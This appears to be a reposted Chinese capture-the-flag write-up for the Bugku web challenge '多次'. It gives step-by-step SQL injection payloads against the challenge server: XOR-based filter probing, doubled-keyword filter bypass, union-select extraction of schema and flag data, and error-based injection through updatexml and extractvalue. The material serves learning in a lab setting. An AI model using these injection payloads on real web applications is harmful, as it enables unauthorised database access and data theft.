首页 > Web开发 > 详细

bugku web 多次

时间:2020-02-09 21:25:23      阅读:56      评论:0      收藏:0      [点我收藏+]

题目链接

打开题目,看到url后面有一个id=1,猜想是不是sql注入,于是在1后面加上单引号。

页面报错,说明存在注入点。

将url改成http://123.206.87.240:9004/1ndex.php?id=1‘ and 1=1%23,页面却报错了,说明这里可能有过滤。

这里就要说到异或注入,来判断被过滤的词。

异或注入

异或为一种逻辑运算,当两个条件相同(同真或同假)时为假,当两个条件不同时为真。

在mysql中异或用^或xor来表示。

当url为http://123.206.87.240:9004/1ndex.php?id=1‘^(length(‘and‘)!=0)%23

  • 若and的长度为0(即为被过滤),则^(length(‘and‘)!=0)为假,表达式就为id=1^0=1,页面正常
  • 若and的长度为不为0(即为被过滤),则^(length(‘and‘)!=0)为真,表达式就为id=1^1=0,页面错误

页面正常,说明and被过滤,同理,我们可以检测出select,union,or被过滤,用双写来绕过过滤。

构造payload

http://123.206.87.240:9004/1ndex.php?id=1‘oorrder by 1%23

  • 当数字为3时,页面错误,说明字段数为2

http://123.206.87.240:9004/1ndex.php?id=0‘ ununionion seselectlect 1,2 %23(id=0是为了让页面爆错)

  • 页面显示2,于是从2处注入。

爆数据库

http://123.206.87.240:9004/1ndex.php?id=0‘ ununionion seselectlect 1,database() %23

  • web1002-1

爆表名

http://123.206.87.240:9004/1ndex.php?id=0‘ ununionion seselectlect 1,group_concat(table_name) from infoorrmation_schema.TABLES where table_schema=database() %23

  • flag1,hint

我们来爆flag1

爆字段名

http://123.206.87.240:9004/1ndex.php?id=0‘ ununionion seselectlect 1,group_concat(column_name) from infoorrmation_schema.COLUMNS where table_name=‘flag1‘ %23

  • flag1,address

爆数据

http://123.206.87.240:9004/1ndex.php?id=0‘ ununionion seselectlect 1,group_concat(flag1) from flag1 %23

  • usOwycTju+FTUUzXosjr

http://123.206.87.240:9004/1ndex.php?id=0‘ ununionion seselectlect 1,group_concat(address) from flag1 %23

技术分享图片

发现下一关的地址。

技术分享图片

在加上单引号,爆错,却无法绕过过滤,采用extractvalue()或updatexml()来爆错。

关于extractvalue()和updatexml()的参考链接

爆库

http://123.206.87.240:9004/Once_More.php?id=1‘ and
updatexml(1,concat(‘~‘,database(),‘~‘),3) %23
  • web1002-2

爆表

http://123.206.87.240:9004/Once_More.php?id=1‘ and
updatexml(1,concat(‘~‘,(select group_concat(table_name) from information_schema.TABLES where
table_schema=database()),‘~‘),3) %23

  • class,flag2

爆字段

http://123.206.87.240:9004/Once_More.php?id=1‘ and
updatexml(1,concat(‘~‘,(select group_concat(column_name) from information_schema.COLUMNS where
table_name=‘flag2‘),‘~‘),3) %23


  • flag2,address

爆数据

http://123.206.87.240:9004/Once_More.php?id=1‘ and
updatexml(1,concat(‘~‘,(select group_concat(flag2) from flag2),‘~‘),3) %23

http://123.206.87.240:9004/Once_More.php?id=1‘ and
extractvalue(1,concat(‘~‘,(select group_concat(flag2) from flag2),‘~‘)) %23

得到flag,题目提示flag全为小写,所以把flag中的大写改成小写。

bugku web 多次

原文:https://www.cnblogs.com/truthilia-12580/p/12288529.html
(0)
(0)
   
举报
评论 一句话评论(0
分享档案
更多>
2021年09月23日 (328)
2021年09月24日 (313)
2021年09月17日 (191)
2021年09月15日 (369)
2021年09月16日 (411)
2021年09月13日 (439)
2021年09月11日 (398)
2021年09月12日 (393)
2021年09月10日 (160)
2021年09月08日 (222)
最新文章
更多>
教程昨日排行
更多>
友情链接
汇智网   PHP教程   插件网  
关于我们 - 联系我们 - 留言反馈 - 联系我们:wmxa8@hotmail.com
© 2014 bubuko.com 版权所有
打开技术之扣,分享程序人生!